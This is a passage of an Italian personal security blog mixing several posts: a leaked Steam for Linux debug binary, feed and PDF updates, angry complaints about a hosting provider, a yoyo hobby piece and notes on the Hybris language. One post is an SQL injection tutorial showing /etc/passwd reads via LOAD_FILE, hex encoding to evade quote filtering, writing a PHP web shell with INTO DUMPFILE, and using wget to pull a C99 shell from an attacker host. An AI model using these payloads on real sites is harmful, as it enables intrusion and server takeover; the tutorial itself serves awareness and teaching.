Nonostante questo, sul wiki di supporto del sito steampowered si legge :

Il client di Steam è una applicazione pensata per Windows, e al momento non è pianificata la creazione di un client di Steam nativo per Linux.

Qualche giorno fa mi sono messo alla ricerca di informazioni in proposito ed indovinate cosa ho trovato ?!

L’eseguibile della versione di sviluppo di Steam per Linux!

Ma la cosa molto, ma molto più interessante è che, tale eseguibile (del quale non conosco assolutamente la provenienza, ma sembrerebbe una versione “leaked”) sembrerebbe essere una versione di debug, ovvero un eseguibile che *teoricamente* sarebbe dovuto rimanere nella ristretta cerchia degli sviluppatori addetti.

Come posso affermare con certezza questa cosa?

Facile, ci sono due motivazioni principali :

• Ho personalmente disassemblato il file prima di eseguirlo, nel caso fosse un virus, un fake o cose simili … e posso dire al 100% che si tratta proprio del client Steam.
• Il file in questione, è pieno di informazioni di debug che ne rivelano la natura.

Ed è questo secondo punto quello più interessante.

Il compilatore GCC, tramite alcuni flag di compilazione, è in grado di integrare diverse informazioni sui sorgenti all’interno del binario stesso.

Tali informazioni servono solitamente durante il debugging dell’eseguibile, in modo tale da mostrare nomi di funzioni, classi e metodi in stile C/C++ invece che in stile assembly.

Il binario di Steam, è pieno zeppo di queste info, al punto che un bravo reverser (quindi non io XD) potrebbe trarre informazioni preziosissime da un eventuale analisi.

Di conseguenza, pubblico :

Uno screenshot tanto per farvi capire di che parlo :

Una lista delle info di debug ricavate tramite objdump .

E per infinire, ovviamente, il binario in questione

Spero che qualche bravo ricercatore possa trarne molte più informazioni di quante non ne ho ricavate io che, purtroppo, mi diletto solamente a tempo perso in questo genere di analisi.

Questo è tutto, fatemi sapere se avete info e/o suggerimenti ^^

Related posts:

1. Perchè ho scelto Arch Linux
2. Redis client library for Hybris
3. Hybris 1.0 beta, strutture e primo passo per l’OO

Da ora, i feed rss di questo blog saranno gestiti tramite FeedBurner, per la precisione all’indirizzo :

http://feeds.feedburner.com/evilsocket-dot-net

Come è possibile vedere ho aggiunto al menu superiore un icona tramite la quale è possibile accedere al burner ed iscriversi.

Prego gli eventuali utenti che fin’ora seguivano i feed direttamente tramite il generatore del blog, di aggiornare i loro reader con il nuovo indirizzo così da permettermi di monitorare eventuali iscrizioni, cilck, trick & track, bim-bum-bam, ecc

Grazie

No related posts.

Di conseguenza ho aggiunto sulla colonna di destra un link alla suddetta chiave, così chiunque abbia la necessità di dialogare con me in maniera sicura e confidenziale potrà facilmente reperire i dati necessari.

Passo e chiudo.

Related posts:

1. Script per il calcolo della chiave WPA dei router FastWeb Pirelli.
2. Script per il calcolo della chiave WPA dei router Alice Gate VoIP 2 Plus Wi-Fi

Un utente in uno dei commenti mi ha chiesto di riscrivere uno dei miei articoli (nella fattispecie l’ultimo sulle sql injections) e dare la possibilità di scaricarlo in PDF come facevo prima di aprire questo blog.

In effetti, non è che mi vada più di tanto ogni volta di rifare lo stesso articoli sia in html che in pdf, così ho installato un plugin per wordpress e l’ho modificato a puntino.

E’ ora possibile, tramite l’apposito link sotto al titolo, esportare ogni articolo in PDF, spero sia una funzionalità utile ^^

PS: Le modifiche al plugine  la grafica con la quale viene generato il pdf sono ancora sperimentali, man mano che avrò tempo e voglia perfezionerò il tutto.

Related posts:

1. Nuova funzione load, come realizzare in poche righe un sistema di plugin
2. WP-Sentinel Pubblicato

Ebbene, è passato più di un anno, Google sicuramente avrà subito tantissimi cambiamenti sia a livello grafico che a livello di funzionalità, eppure questo problema non è ancora stato patchato.

Qui di seguito trovate il mio video, chiedo scusa per la bassa qualità ma quello originale è stato danneggiato tra un backup e l’altro, così il meglio che ho potuto fare è stato scaricarne la versione mp4 da youtube, dove un ragazzo che non conosco ha postato lo stesso video in bassa definizione.

Poi, qualche tempo fa, mi sono imbattuto in un altro video, postato su Vimeo da Emanuele Gentili, il quale mostra sostanzialmente la stessa vulnerabilità.

Il buon emgent, noto per la sua politica di responsible disclousure, ha immediatamente scritto al team tecnico di Google … e cosa gli hanno risposto ?

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?

Perfetto, non solo in più di un anno non è cambiato nulla, non solo questa vulnerabilità potrebbe essere sfruttata in scenari praticamente infiniti, ma lo staff di Google si permette anche di rispondere così!

Che dire … bah! -.-

Related posts:

1. Google Hacking
2. Google : 0, Io : 1
3. Hybris memory lookup, now Google powered!!!

Beh, ieri sera mi è arrivato un PM … sono stato accettato nello staff!

Inutile dire che per me è un onore ed un piacere, spero di poter apportare un contributo effettivo alla comunity e a tutte le persone che vogliono passare a GNU/Linux e hanno la necessità di un supporto competente.

Non posso fare molto per la FSF, ma quel poco lo farò al 100% delle mie capacità!

No related posts.

Più di un anno fa, precisamente il 10 Febbraio 2009, scrivevo questo sul forum prozone :

Premetto innanzitutto che questo post non vuole e non deve essere una critica gratuita e inutile al suddetto provider, bensì spero sia una spintarella un po + violenta del normale per migliorarsi e migliorare i servizi offerti agli utenti/clienti .

Più di un anno fa, decisi di acquistare un dominio su tophost dati i prezzi annuali estremamente vantaggiosi e le poche pretese in termini di spazio web del mio portale .
Inizialmente l’esperienza fu diciamo normale, niente di che, ma poi ho subito iniziato a riscontrare problemi sia per quanto riguarda il lato tecnico dell infrastruttura tophost, sia quello umano, quindi mi accingo a riportarvi una piccola serie di aneddoti tanto per farvi capire perchè, secondo me s’intende, un utente non dovrebbe affidarsi a tophost .

Aneddoto 1
Essendo un programmatore di professione, specializzato nella sicurezza delle infrastrutture informatiche e nei cosiddetti penetration tests (o hacking etico se vogliamo), mi sono da subito preoccupato di fare alcuni test sulla struttura tanto per capire quanto il mio sito avesse “le spalle coperte” da eventuali sistemi di sicurezza del provider.
Bene, nell’arco di 30 minuti di test (che tra l’altro non avrei nemmeno dovuto fare io, ma il personale di tophost), ho scoperto diverse vulnerabilità nel sistema tophost che in pratica consentivano ad una persona qualsiasi di avere accesso ad ogni dato di ogni cliente, a partire dagli accessi ai domini fino ad arrivare alle info anagrafiche e/o bancarie del singolo cliente .
Ca**o penso io, è gravissima sta cosa, va bene che sono umani e come tali soggetti ad errori, ma un provider prima di pubblicare i propri servizi dovrebbe come minimo essere sicuro al 100% che almeno il proprio portale sia sicuro, xkè è proprio la che ho trovato queste falle .
Vabbè, procedo nell’apertura di un ticket dove spiego tutto sperando che risolvino il problema … il risultato ? Una sola delle varie falle è stata risolta parzialmente nell’arco di due mesi (mettendo a repentaglio tutto e tutti), una delle altre falle, è stata risolta solo di recente, quindi a distanza di + di un anno, le altre stanno ancora la .
Ora io mi chiedo, sono loro ad essere incompetenti o gliene frega così poco della sicurezza dei loro clienti da far passare + di un anno per risolvere un problema così grave ?

Aneddoto 2
Come già detto, essendo un programmatore, mi diverto a scrivermi le funzionalità del mio portale da solo, senza ricorrere a soluzioni già pre confezionate … tanto per fare un esempio (perchè per questo aneddoto potrei riportarne almeno una decina solo sul mio sito, a centinaia se parliamo anche dei siti di amici sempre su tophost), mi sono scritto una piccola chat in php+ajax, molto leggera e dinamica tanto per aggiungere un po + di interazione al mio sito .
Ebbene, sapete cosa succede ? Se ci sono + di due utenti che usano la chat contemporaneamente si blocca tutto il sito ed esce fuori il maledetto messaggio (e sono sicuro che anche altri lo conoscono fin troppo bene) “Rate Limit Exceeded” .
Vale a dire “we ragazzo, hai appena saturato la banda che ti diamo, quindi ti blocchiamo tutto” …. ma che ca**o ?!?!?
Cioè mi volete dire che un traffico di meno di 1KB ogni 5 secondi satura la banda ? E che è i nostri domini sono hostati su un tostapane ?!?!?
Beh, mi dico sempre da programmatore scrupoloso, magari è il mio script ad avere qualche difetto, tant’è vero che leggo nelle FAQ di tophost che questa anomalia si riscontra solo nel caso di wep applications fatte male … e invece no ! fatalità ogni altro software php che ho installato da questo problema !!! Mi volete dire che tutti i software del mondo, collaudati da centinaia di migliaia di utenti in tutto il mondo, sono scritto male ? Ma va ! -.-
E il bello qual’è ? Insieme a me, dozzine di altri clienti hanno da sempre richiesto di avere + banda, e ogni singolo ticket aperto in proposito è stato volutamente ignorato !

Aneddoto 3
Su un altro mio dominio (ovviamente non ne riporto i link per non spammare, ma all’occorrenza posso fornire tutti i dati per far vedere che ho prove concrete di quello che dico), avevo installato, tra i vari servizi, un insieme di script in php che permettevano agli utenti di navigare siti internet in modo anonimo, utilizzando il mio stesso sito, in pratica un proxy in php .
Non c’è niente di illegale in questo, molti siti hanno script analoghi, e avevo messo un disclaimer grande quanto un palazzo dove dicevo che eventuali attività illegali sarebbero state loggate e le autorità avvertite, che io non ero responsabile di un uso improprio del servizio, etc etc etc etc etc … eppure, spiegatemi il xkè, nonostate fosse stato tutto perfettamente legale, tophost mi ha bloccato il servizio, nemmeno mandandomi una mail di preavviso, ma deliberatamente entrando nel mio account ftp e bloccando i permessi di esecuzione su quei file !
Ma che min***a siete la gestapo ?!?!?
Studiatevi la legislatura e poi applicatela come si deve, non “a modo vostro” !

Ne potrei riportare tante altre di storielle così, ma non voglio annoiarvi troppo … il significato in fondo è uno solo, il servizio costa poco perchè fa schifo ! Personalmente preferisco aver speso qualche decina di euro in +, trasferendo il sito altrove, ma avere innanzitutto personale competente, servizi all’avanguardia, un infrastruttura sicura che non esponga i miei dati sensibili al primo deficiente che buca il server, e soprattutto senza avere quel cavolo di “Rate Limit Exceeded” per ogni formica che passa sui vostri cavi di rete !
Vi consiglio vivamente di riformare il vostro staff tecnico con persone che sanno quel che fanno e di iniziare ad offrire un servizio non dico buono, ma quanto meno decente, anche facendolo pagare un po di +, nessuno vi chiede di regalare qualcosa in fondo .

Spero che questo post non venga cancellato/censurato, ma piùttosto letto con attenzione .

Distinti saluti,
Simone Margaritelli aka evilsocket

La vicenda purtroppo sfociò in un flame, vuoi un po per lo staff che non seppe gestire il thread, vuoi un po per un “certo” coglione di mia conoscenza che di proposito si mise a trollare … ma la sostanza rimase.

Tophost, non solo offriva un servizio scadente, non solo deteneva infrastrutture bacate che mettevano a rischio i dati sensibili dei loro clienti, ma si arrogava anche il diritto di ritenere che, a prescindere dalla situazione, qualsiasi lamentela di un cliente fosse un evento isolato, da imputarsi solo ed unicamente all’ignoranza informatica del cliente stesso, cosa molto grave a priori, figuriamoci quando questa sorta di insulto lo si indirizza ad un cliente che di mestiere fa quello che dovrebbero fare loro XD.

Ebbene, a distanza di più di un anno, non è cambiato assolutamente nulla!

Oggi mi ritrovo tra i feed rss questo post dal blog iKoala, che sostanzialmente riassume la stessa identica situazione e addirittura mostra l’incompetenza dello staff di tophost!

Lorenzo, l’admin di iKoala, hostato su tophost, stava provando ad aggiornare il suo wordpress alla 3.0 in seguito a diversi problemi, procedura che non è riuscito a concludere a causa della bassa qualità del servizio di hosting.

E cosa si sente rispondere?

Che è colpa sua, che è colpa di wordpress, che non è possibile che una webapp consumi tante risorse (come se fosse una webapp nata ieri wordpress!) e addirittura che (allego immagine di un tweet inviato da non-so-quale-idiota-dello-staff-di-tophost a Lorenzo) :

Ma dico io, ma come cazzo vi permettete?!?!?

Non solo offrite un servizio penoso, non solo a distanza di due anni non avete sistemato nulla, non solo siete degli emeriti ignoranti ed incompetenti che sparano cavolate astronomiche solo per pararsi il culo e non fare una (ennesima) figura di merda, non solo non rispondete ai ticket dei clienti (o se lo fate li chiudete subito con sufficienza) ma vi azzardate anche ad insultare e sbeffeggiare coloro che vi danno il pane pagandovi quel misero servizio ?!?!

A questo punto, il problema non è ne il servizio, ne la sua qualità, tantomeno il suo prezzo … il problema è la vostra arroganza! Ma vergognatevi!

/EOF

No related posts.

Sabato scorso son passato all’hack meeting, invitato da un (nuovo) amico, e mi sono imbattuto in uno speech proprio su questa tecnica di intrusione (che devo dire è anche la mia preferita per quanto concerne il web hacking ) ed il ragazzo che lo stava tenendo ha detto alla fine la frase “con le sql injections si possono fare innumerevoli cose” che mi ha fatto venir voglia di scrivere questo articolo.

Ci sono alcuni aspetti delle SQL injections che in realtà non sono molto conosciuti, ma che aprono davvero un mondo e portano un ipotetico attaccante (o un informatico che deve porre rimedio a questa piaga) nella condizione di avere accessi con privilegi ben superiori a quelli che una “normale” iniezione darebbe.

Accesso in lettura al file system.

MySQL, così come tantissimi altri database, hanno delle funzioni integrate nel linguaggio stesso che offrono funzionalità avanzate all’interno delle query, basti pensare alle funzioni CONCAT() o MID() per operare sulle stringhe.

Una funzione non molto conosciuta, principalmente perchè son pochi gli scenari nella quale convenga usarla, è la funzione LOAD_FILE() che, come suggerisce il nome stesso, serve per caricare il contenuto di un file all’interno di un buffer di MySQL.

Ad esempio, eseguendo la query :

SELECT LOAD_FILE(‘/etc/passwd’)

Riceveremo come risultato il contenuto del rinomato file … beh, perchè non utilizzare tale funzione anche all’interno di un injection ?

Invece di un ipotetico :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,username,password FROM users/**

Potremmo fregarcene della tabella utenti ed andarci direttamente a spulciare il filesystem :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,LOAD_FILE(‘/etc/passwd’),NULL/**

Come aggirare la rogna degli apici.

Seguendo l’esempio qui sopra riportato, vorrei parlare di un altro “trick” di MySQL non motlo conosciuto … spesso durante il testing di una sql injection, ci rendiamo conto che utilizzare degli apici all’interno del codice da noi iniettato diventa una vera rogna, questo specialmente quando la query che esegue la pagina web (e che noi non conosciamo del tutto) è molto complessa, con diverse JOIN ecc, risultando di volta in volta in un errore di sintassi perchè abbiamo messo un apice di troppo (che magari ci è stato segato dalle magic quotes, le puttane!!!).

Questo potrebbe accadere ad esempio, con gli apici utilizzati per passare l’argomento alla funzione LOAD_FILE … ma in realtà, aggirare questo problema (e metterlo nel cxxo alle gpc!) è abbastanza semplice se si conosce il modo … basta codificare in esadecimale!

Ovvero, invece di utilizzare la dicitura

SELECT LOAD_FILE(‘/etc/passwd’)

Utilizzeremo

SELECT LOAD_FILE( 0x2f6574632f706173737764 )

Dove 0x2f6574632f706173737764 corrisponde alla stringa /etc/passwd codificata in esadecimale … e così, via gli apici!

Questo si può utilizzare anche nei confronti (0x61646d696e = admin) :

SELECT NULL,NULL,username,password WHERE username=0x61646d696e

E così via, generalmente ogni qual volta bisognerebbe utilizzare una stringa ma per un motivo o per un altro non possiamo (o vogliamo perchè siam pigri) farlo.

Accesso in scrittura al file system.

Mi son tenuto questa chicca per ultima perchè è la più sfiziosa

Non sarebbe bello poter arrivare, partendo da una semplice sql injection, ad una shell php (o di qual si voglia linguaggio) pronta a runnare sul server in questione, così da poterci spulciare tutto il file system in pace ed eseguire comandi da remoto?

Beh, è fattibilissimo!

Analogamenente alla funzione LOAD_FILE precedentemente vista, esiste anche una coppia di keywords MySQL che invece ci permette di inserire del contenuto arbitrario all’interno del file che vogliamo, tale magica accoppiata è INTO DUMPFILE .

C’è da specificare una cosa che, anche essendo ovvia, non è così banale … dovendo specificare come argomento il path completo del file che vogliamo creare (o sovrascrivere!!), è sottointeso che tale cartella debba essere scrivibile dall’utente con i quali privilegi è in esecuzione il demone MySQL.

Se ci interessasse solamente creare un file non necessariamente raggiungibile via web (quindi non nella cartella nella quale apache si aspetta i file html e php), potremmo benissimo scrivere nella /tmp/ che generalmente è accessibile da tutti, utilizzando la query :

SELECT ‘contenuto’ INTO DUMPFILE ‘/tmp/blablabla’

O meglio ancora, codificato in esadecimale come abbiamo visto prima :

SELECT 0x636f6e74656e75746f INTO DUMPFILE 0x2f746d702f626c61626c61626c61

Dove “contenuto” ovviamente è quello che vogliamo mettere dentro il file …

Scrivere nella /tmp non è molto utile, a meno che il sito sia affetto anche da una LFI (local file inclusion = inclusione di file locali) e quindi potremmo prima creare il file e successivamente forzare una pagina ad includerlo per eseguirlo.

Quello che ci interessa veramente però (almeno quello che solitamente interessa a me ) è scrivere nella stessa cartella che contiene il sito, così da poterci mettere una shell ed utilizzarla in tutta comodità.

Non esiste (o almeno io non l’ho trovato) il modo, tramite una query SQL, di trovare il full path della htdocs, però ci sono un paio di metodi che, con un po di intuito e fortuna funzionano il 99% delle volte.

Il primo, tramite il metodo sopra indicato di lettura del file system,  consiste nel leggere il file di configurazione di apache (httpd.conf) che solitamente è contenuto in /etc/[qualcosa] (dove [qualcosa] è cmq un valore che varia di poco da server a server ed è di conseguenza facilmente ‘guessabile’) e vedere i path dei vari virtual hosts .

Questo metodo però, necessita che l’utente con il quale runna MySQL possa leggere quel file e non sempre questo è possibile anzi, se chi ha configurato il server è bravo, non è quasi mai possibile.

Il secondo metodo invece, funziona praticamente sempre

Ormai, la stragrande maggioranza dei siti utilizza applicazioni web cms quali WordPress, PHPNuke (OMFG c’è ancora chi lo usa!!!), PHPFusion, Joomla e così via.

Tali sistemi, al momento dell’installazione, inseriscono in una tabella (che varia da sistema a sistema, ma essendo questi sistemi opensource cmq le tabelle sono note) il full path nel quale sono stati installati, il più delle volte per poter includere correttamente i vari file php che gli servono, altre volte (specialmente nel caso dei forum) per sapere in quale cartella, ad esempio, possono spostare gli allegati uploadati in un post.

Ebbene … è proprio quello che ci serve!

Abbiamo una sql injection, sappiamo quale sistema PHP gira nel sito, sappiamo quale colonna di quale tabella ci interessa … ci basterà utilizzare una sql injection che selezioni quella variabile dal database e eccoci qui, abbiamo il full path di installazione del sito che stiamo attaccando!

A questo punto, ipotizzando che il path sia “/var/www/htdocs/sito.com/” (ipotesi tra l’altro non molto distante dalle casistiche reali), potremmo utilizzare una sql injection del tipo :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,’<?php passthru($_GET["cmd"]); ?>‘,NULL INTO DUMPFILE ‘/var/www/htdocs/sito.com/lulz.php’/**

(Magari il tutto opportunamente codificato in hex come visto prima, fate vobis che a me non va XD)

Dalla query risulta evidente come abbiamo scritto un piccolo codice php all’interno della pagina lulz.php, codice che eseguirà qualsiasi comando gli venga passato tramite la variabile “cmd”, mostrandone il contenuto … a questo punto, o utiliziamo lo script direttamente, del tipo :

http://www.site.com/lulz.php?cmd=ls

Oppure, cosa ancor più comoda, potremmo utilizzarlo per scaricare, tramite wget, una shell un attimino più decente (magari una C99) :

http://www.site.com/lulz.php?cmd=wget%20http://www.evilsite.com/c99.txt

http://www.site.com/lulz.php?cmd=mv%20c99.txt%20c99.php

Ed eccoci qua, da una semplice e comune SQL injection, siamo passati ad avere una shell sul server! Non male vero? Soprattutto se pensate che tramite queste funzioni è possibile accedere, tramite i privilegi del demone MySQL, anche ad eventuali risorse di rete … a voi la ricerca!

Ci tengo a precisare che non sto scrivendo un articolo di questo genere, dopo tanto tempo che non ne scrivevo, per incitare le persone a lamerare, ma solo per sensibilizzare quei programmatori che troppo spesso, soprattutto in ambito professionale, sottovalutano dei bug apparentemente piccoli ma che, come mostrato, possono portare a conseguenze veramente disastrose.

Cya the next time!

Related posts:

1. Introduction to SQL Injections
2. iScan
3. Usare la serializzazione in PHP per il caching delle query SQL

Prima di iniziare a ridacchiare e pensare “Questo sta fuori, c’ha 20 anni per gamba e ancora gioca con queste cose!!” (xkè so che molti di voi lo staranno pensando! XD), guardate questo video e poi giudicate se sto parlando di un giocattolo o di un vero e proprio sport :

(Video di Jensen Kimmit)

Bene, ora che ho la vostra attenzione (almeno spero ), vi parlerò un po di questa parte del mio mondo ^^

Lo yoyo, così come la maggior parte della gente lo conosce, ovvero quel giocattolo che, legato ad un cordino, se tirato e poi strattonato torna in mano, viene chiamato “responsive” ad indicare per l’appunto il fatto che ha un sistema ad asse fisso o comunque un sistema di ritorno automatico.

Questo è solo una delle varie tipologie, che ha avuto il suo massimo successo negli anni ’90, chi ha la mia età ricorderà quel periodo pieno di yoyo in tv, nei negozi di giocattoli e persino nelle bancarelle degli ambulanti.

Successivamente è stato introdotto un sistema di ritorno con cuscinetto a sfera, che consente di eseguire delle figure (dette “tricks”) come quelle che abbiamo visto nel video qui sopra.

Tale sistema consiste in un asse di metallo che unisce le due coppe dello yoyo (solitamente in alluminio, ma ne vengono realizzate anche in plastica, carbonio e perfino titanio!), ed un cuscinetto a sfera (i più buoni con sfere ceramiche) intorno a questo asse che, essendo libero di girare, fa si che lo yoyo non torni in mano subito (in tal caso si parla di yoyo “unresponsive”), bensì rimanga in rotazione (in “sleeper”) fin quando il giocatore (detto “yoer”) non esegua un trick chiamato bind, il quale consente di riavvolgere il cordino e far tornare su lo yoyo.

Circa un anno fa, girovagando per negozi con la mia fidanzata, mi sono imbattuto, dentro una giocoleria, in uno yoyo ad asse fisso che mi ricordava tantissimo uno che avevo quando ero piccolo … vuoi perchè sono ancora un ragazzino cresciuto, vuoi un po per nostalgia, l’ho comprato ed ho iniziato a lanciarlo (dicasi loopare nel caso di yoyo ad asse fisso) per tutta la serata, ovviamente incuriosendo i passanti e mettendo in enorme imbarazzo la mia fidanzata che, nonostante sia abituata a queste mie stramberie, ogni tanto rimane ancora stupita di quanto io sia capace di fregarmene altamente dell’opinione di chi mi guarda XD

Tornato a casa la sera, mi son messo un po a cercare su internet per trovare qualche informazione, qualche trick, qualche video insomma ed ho scoperto non un mondo, ma un intero universo che gira dietro questo sport/passione!!!

Inizialmente trovai una marea inimmaginabile di video su youtube di yoer come Jensen Kimmit (il ragazzo canadese del video qui sopra), Jason Lee (pluri campione mondiale), ecc ecc ecc e poi approdai su http://www.yoyomaniacs.com/ .

Una vera e propria associazione di giocatori, sempre pronti ad aiutarmi nell’imparare nuovi trick, a cazzeggiare ai raduni o semplicemente  a scambiare quattro chiacchiere .

Ho scoperto che ogni nazione ha un suo campionato nazionale di yoyo ed in quello passato ho partecipato, come spettatore ovviamente, anche io … così come c’è un campionato mondiale dove, i più bravi di tutto il mondo si sfidano all’ultimo trick in free style che tolgono veramente il fiato.

Così, tornando alla mia esperienza personale, acquistai il mio primo yoyo unresponsive, un Plastic Grind Machine, ed iniziai a trickeggiare.

Beh, sarò strano io, ma ho scoperto che non solo era divertente, ma mi rilassava moltissimo tra una sessione e l’altra di coding, nonchè stimolava i miei riflessi e la mia creatività … insomma, una specie di super-giocattolo per adulti

Bon, con questo chiudo perchè potrei continuare per mesi a parlarne

Se per caso ho stimolato la vostra curiosità, sarò lieto di rispondere ad ogni domanda nei commenti di questo articolo, così come saranno pronti ad accogliere qualsiasi nuovo giocatore i ragazzi dell’associazione italiana yoyo ^^

No related posts.

Una volta provato e visto che funzionava, mi son detto "beh, vediamo fino a che punto si può arrivare!" :)

Bene, ho preso il primo esempio di ncurses che mi ha restituito google e ho provato a convertirlo con questa tecnica, quindi senza implementare a mano un modulo di binding per la libreria ncurses per Hybris, bensì caricando direttamente il modulo nativo in C .

Il risultato ?

Esattamente come la sua controparte in C!!! :D

Conclusione, la tecnica del Dll loading si sta rivelando molto più potente e utile di quanto previsto! :P

Il codice Hybris lo trovate sul nopaste.

read more